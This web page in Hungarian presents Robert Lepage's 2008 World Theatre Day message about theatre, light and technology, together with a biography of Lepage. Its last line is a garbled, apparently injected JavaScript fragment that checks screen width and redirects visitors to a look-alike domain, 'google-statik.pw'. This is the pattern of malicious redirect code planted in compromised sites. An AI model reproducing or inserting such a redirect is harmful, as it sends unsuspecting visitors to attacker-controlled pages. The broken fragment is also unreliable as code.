Színházi Világnapi Üzenet 2008

Sokfele felteves van arrol, hogyan jott letre a szinhaz, ezek kozul egy mese-valtozat erintett meg a leginkabb: az idok kezdeten egy ejszaka az emberek osszegyultek a kobarlangban a tuz korul es meseltek egymasnak. Egyszer csak valamelyikuknek az az otlete tamadt, hogy mesejet sajat arnyekaval illusztralja. A langok fenyeben a termeszetesnel nagyobb arny alakok jelentek meg a kobarlang falan. A tobbiek elbuvolten figyeltek, es vilagosan felismertek, melyik arny az eros es melyik a gyenge, az elnyomo es az elnyomott, az Isten es a halando.

Napjainkban a reflektorok fenye helyettesiti az oromtuzet, es a szinpadi gepezet a kobarlang falat. Es barmennyire is tisztelek nehany puristat, ez a mese engem arra emlekeztet, hogy a technika mar a kezdetek kezdeten jelen volt a szinhazban, es nem szabad fenyegeteskent ertelmezni, inkabb egysegteremto eszkozkent.

A szinhazmuveszet fennmaradasa azon mulik, hogy kepes-e megujulni, be tudja-e fogadni az uj eszkozoket, az uj nyelveket. Kulonben hogyan mutathatna be a kor nagy kihivasait, es hogyan segithetne az emberek kozti megertest, ha sajat maga nem nyitott szellemu? Hogyan kerkedhetne azzal, hogy megoldasokat kinal az intolerancia, a kirekesztettseg, a rasszizmus problemaira, ha sajat gyakorlataban elvet mindenfele mufaji keveredest es integraciot?

Ha a muvesz a vilagot a maga egeszeben akarja megmutatni, uj formakat es gondolatokat kell megfogalmaznia, es biznia kell a nezo intelligenciajaban, hogy az orokos feny- es arnyjatekban kepes felfedezni az emberit.

Igaz, ha az ember tul sokat jatszik a tuzzel, elofordulhat, hogy megegeti magat, de abban a szerencseben is resze lehet, hogy elkapraztat es megvilagosit.

Robert Lepage

Quebec, 2008. februar 17.

Forditotta: Lakos Anna


Robert Lepage, egy „interkulturalis” szinhazi alkoto

A sokoldalu Robert Lepage a muveszet legkulonbozobb teruletein

egyforman nagyszeru alkotasokat hoz letre. A szinhaz es filmrendezo, dramairo es forgatokonyviro, szcenografus es szinesz Lepage nemzetkozileg elismert, mufaji „hataratlepo” alkoto.

Robert Lepage 1957-ben szuletett Quebecben. 1975-ben, 17 evesen a Quebeci Szinmuveszeti Foiskola hallgatoja lesz, 1978-ban egy osztondijjal Parizsban tanul. Hazaterese utan tobb eloadasban rendezokent, szineszkent, dramairokent vesz reszt. 1984-ben a Circulations cimu eloadasaval bejarja Kanadat, es elnyeri a Quinzaine (a Quebec-i Nemzetkozi Szinhazi Fesztival) nagydijat. A nemzetkozi hirnevet a legendas Trilogie des dragons (Sarkany-trilogia) cimu eloadas hozza meg a szamara. Ezt a produkciot mar sajat tarsulataval, az ExMachina nevre hallgato multidiszciplinaris alkotokozosseggel hozza letre.

A hagyomanyos szinhazi kodoknak fittyet hanyo Lepage Magyarorszagon a kilencvenes evek kozepen jart. A Petofi Csarnokbana Miles Davis es Jean Cocteau leveleibol keszult L’Aiguille et l’opium (Tu es opium) cimu eloadasat lathatta a kozonseg. Ezzel a csapattal mutatja be Les Sept Branches de la riviere Ota (Az Ota folyo het aga) c. darabot (1994), a Szentivaneji almot (1995), valamint szolo eloadasat Elseneur cimmel (1995-1997).

Eloszor 1994-ben fordul a filmmuveszet fele, es megirja a Le Confessionnal c forgatokonyvet, amelyet megfilmesit. Ezutan sorra rendezi filmjeit, Poligraf (1996), No (1997), Possible Worlds (2000), 2003-ban sajat darabjat, La Face cachee de la Lune (A Hold titkos arca) filmesiti meg.

1997-ben Caserne neven letrehozza uj, multidiszciplinaris produkcios kozpontjat.

Magyarul tobbek kozott:

Kurtosi Katalin cikke / Magyar Szinhaz Portal

Mesterhazi Mate: Racio es religio / Muzsika.net

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width